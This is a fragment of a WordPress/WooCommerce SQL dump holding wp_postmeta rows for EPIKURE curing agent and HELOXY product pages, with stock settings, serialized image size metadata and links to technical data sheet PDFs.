INSERT INTO `wp_postmeta` VALUES (12132, 1058, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5481;s:6:"height";i:3648;s:4:"file";s:21:"2016/08/EPIKURE-W.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-W-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPIKURE-W-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPIKURE-W-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPIKURE-W-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-W-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPIKURE-W-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPIKURE-W-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPIKURE-W-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12133, 1059, '_edit_lock', '1479930288:3'); 
INSERT INTO `wp_postmeta` VALUES (12134, 1015, '_thumbnail_id', '1056'); 
INSERT INTO `wp_postmeta` VALUES (12135, 1059, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12136, 1016, '_thumbnail_id', '1057'); 
INSERT INTO `wp_postmeta` VALUES (12137, 1060, '_wp_attached_file', '2016/08/W.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12138, 1059, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12139, 1059, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12140, 1059, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12141, 1059, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12142, 1059, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12143, 1059, '318_custom_list_file', 'a:2:{s:32:"81127ecefb9cfeed5df11bd6e1e4af75";a:3:{s:4:"name";s:9:"EPIKURE W";s:4:"file";s:66:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/W.pdf";s:4:"desc";s:13:"EPIKURE W TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (12144, 1059, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12145, 1059, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12146, 1059, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12147, 1059, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12148, 1059, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12149, 1059, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12150, 1059, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12151, 1059, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12152, 1059, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12153, 1059, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12154, 1059, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12155, 1059, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12156, 1059, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12157, 1059, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12158, 1059, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12159, 1059, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12160, 1059, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12161, 1059, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12162, 1059, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12163, 1059, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12164, 1059, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12165, 1059, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12166, 1059, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12167, 1059, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12168, 1059, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12169, 1059, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12170, 1059, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12171, 1059, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12172, 1059, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12173, 1059, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12174, 1061, '_edit_lock', '1474651605:3'); 
INSERT INTO `wp_postmeta` VALUES (12175, 1061, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12176, 1062, '_wp_attached_file', '2016/08/3370.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12177, 1061, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12178, 1061, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12179, 1061, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12180, 1061, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12181, 1061, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12182, 1061, '318_custom_list_file', 'a:2:{s:32:"903331f8fc010e7161f6a35d5239eb05";a:3:{s:4:"name";s:12:"EPIKURE 3370";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/3370.pdf";s:4:"desc";s:16:"EPIKURE 3370 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:15:"Produc Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (12183, 1061, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12184, 1061, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12185, 1061, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12186, 1061, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12187, 1061, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12188, 1061, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12189, 1061, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12190, 1061, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12191, 1061, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12192, 1061, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12193, 1061, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12194, 1061, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12195, 1061, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12196, 1061, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12197, 1061, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12198, 1061, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12199, 1061, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12200, 1061, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12201, 1061, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12202, 1061, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12203, 1061, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12204, 1061, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12205, 1061, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12206, 1061, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12207, 1061, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12208, 1061, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12209, 1061, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12210, 1061, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12211, 1061, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12212, 1061, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12213, 1061, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12214, 967, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12215, 1063, '_edit_lock', '1474651422:3'); 
INSERT INTO `wp_postmeta` VALUES (12216, 1063, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12217, 1064, '_wp_attached_file', '2016/08/3270.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12218, 1063, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12219, 1063, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12220, 1063, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12221, 1063, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12222, 1063, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12223, 1063, '318_custom_list_file', 'a:2:{s:32:"de7e8e19c74145e2ec68e114de67c4a8";a:3:{s:4:"name";s:12:"EPIKURE 3270";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/3270.pdf";s:4:"desc";s:16:"EPIKURE 3270 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (12224, 1063, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12225, 1063, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12226, 1063, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12227, 1063, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12228, 1063, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12229, 1063, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12230, 1063, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12231, 1063, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12232, 1063, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12233, 1063, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12234, 1063, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12235, 1063, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12236, 1063, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12237, 1063, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12238, 1063, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12239, 1063, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12240, 1063, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12241, 1063, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12242, 1063, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12243, 1063, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12244, 1063, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12245, 1063, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12246, 1063, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12247, 1063, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12248, 1063, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12249, 1063, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12250, 1063, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12251, 1063, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12252, 1063, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12253, 1063, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12254, 1065, '_edit_lock', '1474651478:3'); 
INSERT INTO `wp_postmeta` VALUES (12255, 1065, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12256, 1066, '_wp_attached_file', '2016/08/3155.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12257, 1065, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12258, 1065, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12259, 1065, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12260, 1065, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12261, 1065, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12262, 1065, '318_custom_list_file', 'a:2:{s:32:"872cbed5a5b3adf7c7b493e2adf901e2";a:3:{s:4:"name";s:12:"EPIKURE 3155";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/3155.pdf";s:4:"desc";s:16:"EPIKURE 3155 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (12263, 1065, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12264, 1065, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12265, 1065, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12266, 1065, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12267, 1065, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12268, 1065, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12269, 1065, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12270, 1065, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12271, 1065, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12272, 1065, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12273, 1065, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12274, 1065, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12275, 1065, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12276, 1065, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12277, 1065, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12278, 1065, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12279, 1065, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12280, 1065, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12281, 1065, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12282, 1065, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12283, 1065, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12284, 1065, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12285, 1065, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12286, 1065, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12287, 1065, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12288, 1065, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12289, 1065, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12290, 1065, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12291, 1065, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12292, 1065, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12293, 1067, '_edit_lock', '1474651550:3'); 
INSERT INTO `wp_postmeta` VALUES (12294, 1067, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12295, 1068, '_wp_attached_file', '2016/08/3015.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12296, 1067, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12297, 1067, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12298, 1067, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12299, 1067, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12300, 1067, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12301, 1067, '318_custom_list_file', 'a:2:{s:32:"c4e006a7e77c5bc5ab04a462c78836c8";a:3:{s:4:"name";s:12:"EPIKURE 3015";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/3015.pdf";s:4:"desc";s:16:"EPIKURE 3015 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (12302, 1067, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12303, 1067, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12304, 1067, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12305, 1067, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12306, 1067, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12307, 1067, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12308, 1067, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12309, 1067, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12310, 1067, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12311, 1067, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12312, 1067, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12313, 1067, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12314, 1067, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12315, 1067, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12316, 1067, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12317, 1067, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12318, 1067, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12319, 1067, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12320, 1067, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12321, 1067, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12322, 1067, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12323, 1067, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12324, 1067, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12325, 1067, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12326, 1067, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12327, 1067, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12328, 1067, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12329, 1067, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12330, 1067, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12331, 1067, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12332, 1069, '_edit_lock', '1478551522:3'); 
INSERT INTO `wp_postmeta` VALUES (12333, 1069, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (12334, 1070, '_wp_attached_file', '2016/08/HELOXY-aliphatic-ether.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12335, 1070, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3050;s:6:"height";i:2033;s:4:"file";s:34:"2016/08/HELOXY-aliphatic-ether.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"HELOXY-aliphatic-ether-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"HELOXY-aliphatic-ether-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"HELOXY-aliphatic-ether-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"HELOXY-aliphatic-ether-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"HELOXY-aliphatic-ether-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"HELOXY-aliphatic-ether-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"HELOXY-aliphatic-ether-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"HELOXY-aliphatic-ether-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12336, 1071, '_wp_attached_file', '2016/08/HELOXY-aromatic-ether.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12337, 1071, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2625;s:6:"height";i:1750;s:4:"file";s:33:"2016/08/HELOXY-aromatic-ether.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"HELOXY-aromatic-ether-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"HELOXY-aromatic-ether-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"HELOXY-aromatic-ether-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"HELOXY-aromatic-ether-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"HELOXY-aromatic-ether-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"HELOXY-aromatic-ether-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"HELOXY-aromatic-ether-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"HELOXY-aromatic-ether-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12338, 1072, '_edit_lock', '1487964288:2'); 
INSERT INTO `wp_postmeta` VALUES (12339, 1072, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12340, 1073, '_wp_attached_file', '2016/08/heloxy-61.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12341, 1074, '_wp_attached_file', '2016/08/heloxy-overview-new.pdf'); 
INSERT INTO `wp_postmeta` VALUES (12342, 1069, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12343, 1069, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12344, 1069, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12345, 1069, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12346, 1069, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12347, 1069, '318_custom_list_file', 'a:2:{s:32:"bfcf8bf9f52c4b6bf7703980bdd8eb2e";a:3:{s:4:"name";s:9:"HELOXY 61";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-61.pdf";s:4:"desc";s:13:"HELOXY 61 TDS";}s:32:"f37e7788ae15521b493ecd57ee713aae";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
